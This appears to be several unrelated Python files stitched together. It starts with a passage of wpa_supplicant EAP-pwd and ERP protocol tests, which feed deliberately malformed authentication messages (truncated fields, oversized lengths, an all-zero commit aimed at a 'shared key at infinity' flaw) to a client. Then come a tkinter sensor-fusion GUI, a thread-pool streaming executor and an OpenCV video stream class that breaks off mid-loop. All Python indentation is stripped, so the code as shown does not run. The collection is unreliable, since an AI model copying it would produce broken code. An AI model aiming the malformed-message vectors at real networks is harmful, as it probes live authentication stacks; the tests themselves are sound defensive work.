password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
with fail_test(dev[0], 1, "get_master_key;eap_mschapv2_change_password"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_pwd(dev, apdev):
"""EAP-pwd protocol tests"""
check_eap_capa(dev[0], "PWD")
global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
eap_proto_pwd_test_done = False
eap_proto_pwd_test_wait = False
def pwd_handler(ctx, req):
logger.info("pwd_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_pwd_test_wait
eap_proto_pwd_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_PWD)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Total-Length field")
payload = struct.pack("B", 0x80)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large Total-Length")
payload = struct.pack(">BH", 0x80, 65535)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BH", 0xc0, 10)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Total-Length value in the second fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment with extra data")
payload = struct.pack(">BHB", 0x80, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BHB", 0xc0, 2, 1)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Extra data in the second fragment")
payload = struct.pack(">BBB", 0x0, 2, 3)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short id exchange")
payload = struct.pack(">B", 0x01)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported rand func in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported prf in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported password pre-processing technique in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected commit exchange")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Commit payload length")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
payload = struct.pack(">B", 0x02) + 96*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm payload length 0")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm payload with incorrect value")
payload = struct.pack(">B", 0x03) + 32*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected confirm exchange")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
logger.info("No more test responses available - test case completed")
global eap_proto_pwd_test_done
eap_proto_pwd_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pwd_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_pwd_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ok = False
for j in range(5):
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
"CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
ok = True
break
if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
ok = True
break
if not ok:
raise Exception("Expected EAP event not seen")
if eap_proto_pwd_test_wait:
for k in range(10):
time.sleep(0.1)
if not eap_proto_pwd_test_wait:
break
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_pwd_errors(dev, apdev):
"""EAP-pwd local error cases"""
check_eap_capa(dev[0], "PWD")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 7):
with alloc_fail(dev[0], i, "eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wpabuf_alloc;eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 12):
with alloc_fail(dev[0], i, "eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_msg_alloc;=eap_pwd_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
# No password configured
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
timeout=15)
if ev is None:
raise Exception("EAP-pwd not started")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_erp(dev, apdev):
"""ERP protocol tests"""
check_erp_capa(dev[0])
global eap_proto_erp_test_done
eap_proto_erp_test_done = False
def erp_handler(ctx, req):
logger.info("erp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type")
return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Reserved field")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH_START)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Zero-length TVs/TLVs")
payload = ""
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV")
payload = struct.pack("B", 191)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV")
payload = struct.pack("BB", 191, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
payload = struct.pack("BBB", 191, 0, 192)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: More than one keyName-NAI")
payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
EAP_ERP_TLV_KEYNAME_NAI, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV keyName-NAI")
payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV keyName-NAI")
payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
EAP_ERP_TV_RMSK_LIFETIME, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type (Finish)")
return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing fields (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SEQ (Finish)")
return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
4 + 1 + 4,
EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)
logger.info("No more test responses available - test case completed")
global eap_proto_erp_test_done
eap_proto_erp_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(erp_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_erp_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
|
a_sfVisualize.py | """
Main file that interacts with the user.
"""
import tkinter as tk
from b_viewCube import ViewCube
from c_wifiInterface import *
"""
0 - network_btn
1 - cube_btn
2 - fusedData_btn
3 - rawData_btn
A button is in ON state if the default task it is mapped to is being executed.
"""
is_btn_on = [False, False, False, False]
stop_threads = False
# Initializing threads
th_view_cube = ViewCube()
th_recv_data = RecvWifiData()
# This instance sends a PING to the server to
# bypass the blocking s.accept() function and stop the server
th_dummy_client = SendWifiData()
def network_btn_clicked():
global th_recv_data
global th_dummy_client
if is_btn_on[0]:
is_btn_on[0] = False
if th_recv_data.is_alive():
th_recv_data.start_server = False
th_dummy_client.start()
th_recv_data.join()
th_dummy_client.join()
network_btn['text'] = 'Get Data'
th_dummy_client = SendWifiData()
th_recv_data = RecvWifiData()
else:
if not th_recv_data.is_alive():
th_recv_data.daemon = True
if is_btn_on[3]:
th_recv_data.show_raw_data = True
th_recv_data.start()
network_btn['text'] = 'Stop Data'
is_btn_on[0] = True
def cube_btn_clicked():
global th_view_cube
if is_btn_on[1]:
is_btn_on[1] = False
if th_view_cube.is_alive():
th_view_cube.show_cube = False
th_view_cube.join()
cube_btn['text'] = 'Open Cube'
th_view_cube = ViewCube()
else:
if not th_view_cube.is_alive():
th_view_cube.daemon = True
th_view_cube.start()
cube_btn['text'] = 'Close Cube'
th_view_cube.show_cube = True
is_btn_on[1] = True
def fusedData_btn_clicked():
if is_btn_on[2]:
th_recv_data.th_fusion.show_fused_data = False
fusedData_btn['text'] = 'Show \nFused Data'
is_btn_on[2] = False
else:
fusedData_btn['text'] = 'Hide \nFused Data'
is_btn_on[2] = True
th_recv_data.th_fusion.show_fused_data = True
if is_btn_on[3]:
rawData_btn_clicked()
def rawData_btn_clicked():
global th_recv_data
if is_btn_on[3]:
th_recv_data.show_raw_data = False
rawData_btn['text'] = 'Show \nRaw Data'
is_btn_on[3] = False
else:
th_recv_data.show_raw_data = True
rawData_btn['text'] = 'Hide \nRaw Data'
is_btn_on[3] = True
if is_btn_on[2]:
fusedData_btn_clicked()
def check_cube_closed():
while not stop_threads:
if not th_view_cube.is_alive() and th_view_cube.show_cube:
# the var th_view_cube.show_cube is set to False only by cube_btn_clicked()
# if the thread is not alive, but the var's var is True, it implies that cube_btn_clicked()
# was not executed. So, to close the thread, we execute it.
print('force close cube')
cube_btn_clicked()
# initialization
if __name__ == '__main__':
print('Initializing: Sensor Fusion Visualizer')
# Setting up the window
window = tk.Tk()
window.title("Sensor Fusion Visualizer")
window.geometry("390x380")
window.resizable(width=False, height=False)
window.columnconfigure([0, 1], weight=1, minsize=100)
window.rowconfigure([0, 1], weight=1, minsize=100)
# Setting up components
network_btn = tk.Button(master=window, text="Get Data", command=network_btn_clicked)
network_btn.grid(row=0, column=0, padx=5, pady=5)
network_btn.config(font=("Calibri", 20))
cube_btn = tk.Button(master=window, text="Open Cube", command=cube_btn_clicked)
cube_btn.grid(row=0, column=1, padx=5, pady=5)
cube_btn.config(font=("Calibri", 20))
fusedData_btn = tk.Button(master=window, text="Show \nFused Data", command=fusedData_btn_clicked)
fusedData_btn.grid(row=1, column=0, padx=5, pady=5)
fusedData_btn.config(font=("Calibri", 20))
rawData_btn = tk.Button(master=window, text="Show \nRaw Data", command=rawData_btn_clicked)
rawData_btn.grid(row=1, column=1, padx=5, pady=5)
rawData_btn.config(font=("Calibri", 20))
# initializing threads
th_check_cube = threading.Thread(target=check_cube_closed)
th_check_cube.daemon = True
th_check_cube.start()
window.mainloop()
print('Program ended gracefully.')
|
stream.py | import time
from queue import Queue, Full, Empty
from concurrent.futures import Executor, ThreadPoolExecutor, ProcessPoolExecutor
from concurrent.futures.process import _get_chunks, _process_chunk
from functools import partial
import sys
import contextlib
import threading
import itertools
class StreamExecutor(Executor):
def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
"""Returns an iterator equivalent to map(fn, iter).
Args:
fn: A callable that will take as many arguments as there are
passed iterables.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
chunksize: The size of the chunks the iterable will be broken into
before being passed to a child process. This argument is only
used by ProcessPoolExecutor; it is ignored by
ThreadPoolExecutor.
buffer_size: The maximum number of input items that may be
stored at once; default is a small buffer; 0 for no limit. The
drawback of using a large buffer is the possibility of wasted
computation and memory (in case not all input is needed), as
well as higher peak memory usage.
Returns:
An iterator equivalent to: map(func, *iterables) but the calls may
be evaluated out-of-order.
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
Exception: If fn(*args) raises for any values.
"""
if not callable(fn):
raise TypeError('fn argument must be a callable')
if timeout is None:
end_time = None
else:
end_time = timeout + time.time()
if buffer_size is None:
buffer_size = -1
elif buffer_size <= 0:
raise ValueError('buffer_size must be a positive number')
current_thread = threading.current_thread()
iterators = [iter(iterable) for iterable in iterables]
# Deadlocks on the two queues are avoided using the following rule.
# The writer guarantees to place a sentinel value into the buffer
# before exiting, and to write nothing after that; the reader
# guarantees to read the queue until it encounters a sentinel value
# and to stop reading after that. Any value of type BaseException is
# treated as a sentinel.
future_buffer = Queue(maxsize=buffer_size)
cancel = False
# This function will run in a separate thread.
def consume_inputs():
nonlocal cancel
while not cancel:
future = None
try:
args = [next(iterator) for iterator in iterators]
except BaseException as e:
# StopIteration represents exhausted input; any other
# exception is due to an error in the input generator. We
# forward the exception downstream so it can be raised
# when client iterates through the result of map.
future = e
if not future:
try:
future = self.submit(fn, *args)
except BaseException as e:
# E.g., RuntimeError from shut down executor.
# Forward the new exception downstream.
future = e
while True:
try:
future_buffer.put(future, timeout=1)
except Full:
if cancel or not current_thread.is_alive():
cancel = True
break
else:
continue
if isinstance(future, BaseException):
return
else:
break
while True:
try:
future = future_buffer.get(block=False)
except Empty:
return
if isinstance(future, BaseException):
return
future.cancel()
# Instances of this class will be created and their methods executed in the main thread.
class Producer:
def __next__(self):
nonlocal cancel
future = future_buffer.get()
if isinstance(future, BaseException):
# Reraise upstream exceptions at the map call site.
raise future
if end_time is None:
remaining_timeout = None
else:
remaining_timeout = end_time - time.time()
# Any exceptions (errors in the callable fn, TimeOut,
# GeneratorExit) will be raised at map call site.
try:
return future.result(remaining_timeout)
except BaseException:
cancel = True
raise
def __iter__(self):
return self
def __del__(self):
nonlocal cancel
cancel = True
thread = threading.Thread(target=consume_inputs)
thread.start()
return Producer()
class StreamThreadPoolExecutor(StreamExecutor, ThreadPoolExecutor): ...
class StreamProcessPoolExecutor(StreamExecutor, ProcessPoolExecutor):
def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
if buffer_size is not None:
buffer_size //= max(1, chunksize)
if chunksize < 1:
raise ValueError("chunksize must be >= 1.")
results = super().map(partial(_process_chunk, fn),
_get_chunks(*iterables, chunksize=chunksize),
timeout=timeout, buffer_size=buffer_size)
return itertools.chain.from_iterable(results)
|
videostream.py | import os, logging, time
import cv2
from queue import Queue, Full, Empty
import threading
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
class VideoStream:
default_fps = 30.
def __init__(self, stream_source, interval=0.5):
'''
Parameters:
stream_source: RTSP, camera index, or video file name
self.interval: how long to wait before next frame is served (sec)
'''
if stream_source == "":
raise ValueError("stream cannot be empty")
if interval <= 0 or interval >= 24 * 3600:
raise ValueError("pulse interval should be positive, shorter than a day")
self.keep_listeing_for_frames = True
self.frame_queue = Queue(100)
self.cam = stream_source
self.interval = interval
self.frame_grabber = None
self.is_rtsp = self.cam.lower().startswith('rtsp')
# fix if the source is local device like /dev/video0
if(stream_source.isdigit()):
self.cam = int(stream_source)
self.fps = None
self.delay_frames = None
self.delay_time = None
self.video_capture = None
def stop(self):
self.keep_listeing_for_frames = False
if self.frame_grabber is None:
return
try:
if self.frame_grabber.is_alive():
self.frame_grabber.join(1)
self.frame_grabber = None
logging.info("Stopped grabbing frames")
except:
logging.critical("Error while stopping thread")
def reset(self, stream_source, interval):
'''
Any change to stream source or interval will re-set streaming
'''
if stream_source == "":
raise ValueError("stream cannot be empty")
if interval <= 0 or interval >= 24 * 3600:
raise ValueError("pulse interval should be positive, shorter than a day")
self.stop()
self.cam = stream_source
self.interval = interval
self.start()
def start(self):
if self.frame_grabber is not None:
self.stop()
self.keep_listeing_for_frames = True
self.frame_grabber = threading.Thread(target=self.stream_video)
self.frame_grabber.daemon = True
self.frame_grabber.start()
logging.info(f"Started listening for {self.cam}")
def get_frame_with_id(self):
'''
Retrieves the frame together with its frame id
'''
try:
frame_and_id = self.frame_queue.get_nowait()
except Empty:
frame_and_id = (-1, None)
return frame_and_id
def setup_stream(self):
self.video_capture = cv2.VideoCapture(self.cam)
# retrieve camera properties.
# self.fps may not always be available
# TODO: Need to support frame counting for RTSP!
self.fps = self.video_capture.get(cv2.CAP_PROP_FPS)
if self.fps is not None and self.fps > 0:
self.delay_frames = int(round(self.interval * self.fps))
logging.info(f"Retrieved FPS: {self.fps}")
else:
self.delay_time = self.interval
def stream_video(self):
repeat = 3
wait = 0.1
frame = None
cur_frame = 0
# this is used for frame delays if the video is on an infinite loop
continuous_frame = 0
# will create a new video capture and determine streaming speed
self.setup_stream()
while self.keep_listeing_for_frames:
start_time = time.time()
for _ in range(repeat):
try:
res, frame = self.video_capture.read()
if not res:
self.video_capture = cv2.VideoCapture(self.cam)
res, frame = self.video_capture.read()
cur_frame = 0
continuous_frame = 0
break
except:
# try to re-capture the stream
logging.info("Could not capture video. Recapturing and retrying...")
time.sleep(wait)
if frame is None:
logging.info("Failed to capture frame, sending blank image")
continue
# if we don't know how many frames we should be skipping
# we defer to
if self.delay_frames is None and not self.is_rtsp:
cur_delay = self.delay_time - time.time() + start_time
if cur_delay > 0:
time.sleep(cur_delay)
# we are reading from a file, simulate 30 self.fps streaming
# delay appropriately before enqueueing
cur_frame += 1
continuous_frame += 1
if self.delay_frames is not None and (continuous_frame - 1) % self.delay_frames != 0:
continue
